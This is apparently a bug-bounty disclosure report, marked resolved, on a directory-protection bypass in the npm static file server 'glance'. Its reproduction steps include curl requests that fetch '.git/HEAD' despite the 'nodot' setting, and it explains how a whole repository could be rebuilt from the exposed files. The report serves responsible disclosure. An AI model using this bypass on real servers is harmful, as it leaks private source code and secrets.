
[glance] Access unlisted internal files/folders revealing sensitive information

High
N
Node.js third-party modules
Submitted None
Reported by skyn3t

Vulnerability Details

Technical details and impact analysis

Information Exposure Through Directory Listing
I would like to report a sensitive information disclosure in `glance`. It is similar in some ways to #486933.

# Module

**module name:** glance
**version:** 3.0.5
**npm page:** `https://www.npmjs.com/package/glance`

## Module Description

a quick disposable http server for static files

## Module Stats

**weekly downloads** 41

# Vulnerability

## Vulnerability Description

The `glance` module allows directory browsing and serves static files through the browser. The config option `nodot` can be used to prevent serving sensitive folders such as `.git` or files such as `.DS_Store`; refer to https://github.com/jarofghosts/glance#command-line-options. This rule can be bypassed using the technique below, which can lead to sensitive information disclosure (an interesting example: https://smitka.me/).

## Steps To Reproduce:

- Install `glance`:

```
$ npm install -g glance
```

- Inside a project directory, initialise `git`:

```
$ git init
```

- Add a rule to ignore dotfiles in `.glance.json`:

```json
{ "nodot": true }
```

- Start `glance` in the current directory:

```
$ glance --verbose
glance serving /project/directory on port 8080
```

- Now the current directory will be served by `glance`, with the exception of the folder `.git` and the file `.gitignore`.
- If we try to curl `.git` or `.gitignore` we get a Not Found error:

```
$ curl --path-as-is 127.0.0.1:8080/.git
...
<title>File Not Found</title>
...
```

- However, if we try to fetch files/folders inside a forbidden dotfolder there is no problem at all, and most of its content can be extracted successfully (except dotfiles themselves):

```
$ curl --path-as-is 127.0.0.1:8080/.git/HEAD
ref: refs/heads/master
```

> The structure of a git repository is well known, so it is possible to find references to the objects/packs in the repository, download them via direct requests and reconstruct the repository and obtain your files – not only the current ones, but also the past files.

## Supporting Material/References:

- Ubuntu 16.04
- node v11.3.0
- npm 6.7.0

# Wrap up

> Select Y or N for the following statements:

- I contacted the maintainer to let them know: [N]
- I opened an issue in the related repository: [N]

> Hunter's comments and funny memes go here

{F416786}

## Impact

This essentially bypasses the `nodot` feature and allows an attacker to read from a directory that the victim has not allowed access to.

References:

- https://github.com/jarofghosts/glance#command-line-options
- https://smitka.me/

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Information Exposure Through Directory Listing